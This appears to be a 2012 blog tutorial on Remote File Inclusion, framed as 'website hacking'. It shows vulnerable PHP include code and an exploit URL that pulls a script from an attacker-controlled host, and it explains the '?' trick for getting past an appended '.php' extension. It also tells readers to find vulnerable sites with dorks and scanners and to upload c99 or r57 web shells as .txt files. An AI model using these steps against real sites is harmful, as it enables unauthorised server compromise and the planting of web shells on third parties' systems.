Friday, 11 May 2012

RFI (Remote File Inclusion) Tutorial For Website Hacking.





What is Remote File Inclusion ?

First of all what is Remote File Inclusion? Commonly referred as RFI, this is an uncommon form of web attack where the attacker can inject their own scripts and execute it on the web server. I like to call RFI the execution of unpredictable and uncontrollable code.

I'm sure many of you who are reading this have attempted RFI and probably are saying that its a simple method of attack. But ill bet that not many know what occurs behind the scene, how it works, and why it works. Today ill clarify that.



So how does RFI work?
To know how RFI works, you need to have a really basic understanding of PHP. Its not really difficult to understand, but for those who do not understand PHP at all, ill be explaining the code.

Lets say you have a site that is vulnerable to RFI, and its displaying the main page of the site as index.html. This is how the PHP could be scripted on the vulnerable site.

  $file =$_GET['index']; //The page we wish to display
  include($file);
?>

Code Examination:
Ok for those who dont know PHP, let me explain the code, for those who know it, move right along :)

$ is used to declare a variable and then you give it a value with the = sign. Then its using the GET parameter to fetch the index.html. Then lastly, the include($file) simply tells the server to include the variable $file on the page on which is coded. So if you put this PHP code on the front page of the site, it will include the index.html and thats why you can see the index of the site.

How can I search for RFI vulnerable sites?
Well, first, we need to obtain a website with a vulnerability. If you are to lazy to look around here is a google dork you can use to find a vulnerable site:
Also you can use exploit scanners for find RFI Vulnerable site.

Here is a list of some RFI dorks:
Tweaking and exploiting :
What you will need.
You will need to upload your shell in .txt format (shell.txt) instead of .php format (shell.php). I recommend you use c99, r57, Locus, etc.
You will need to upload it to any website hosting.


Example:

The URL of the site looking like this:
http://www.site.com/index.php?page=index.html

Well knowing this, an attacker can exploit the site using RFI like so:
http://www.site.com/index.php?page=http://www.attackersserver.com/my_evil_script.txt?

Before anything, let me explain what happens on the coding side


  $file ="http://www.attackersserver.com/my_evil_script.txt?"; //$_GET['index'];
  include($file); //$file is the script the attacker is including.
?>


As you can see, our variable $file is no longer fetching the "index.html", its including the script the attacker has included from a remote server, hence the name. Why does this work? simply because of the include() function that lets you link files remotely.

As you can see the attacker has included a .txt file and not .php. Well why is that? The reason for this is because if the attacker would have put .php and had PHP installed, the script will execute on his server and not the targets.

Also, you noticed that we added a "?", the reason we did this is because it removes anything that could be in the include() function.

Take this code for example:

  $file =$_GET['index'];
  include($file .".php");
?>

As you can see, there's more than just the variable "$file" in it, and that could pose an issue. The above script adds .php to any file that's being included. So if we included "http://www.attackersserver.com/my_evil_script.txt" without the "?", we are really going to see "http://www.attackersserver.com/my_evil_script.txt.php" because of what's inside of the include() function, which is BAD. So in order to make sure nothing is inside the include() function, we add the ?

Well that's is folks, i hope you learned more about RFI than before. Many of you might know this, others not so much. But i hope it was able to help some people out.


 {Remote File Inclusion }

No comments:

Post a Comment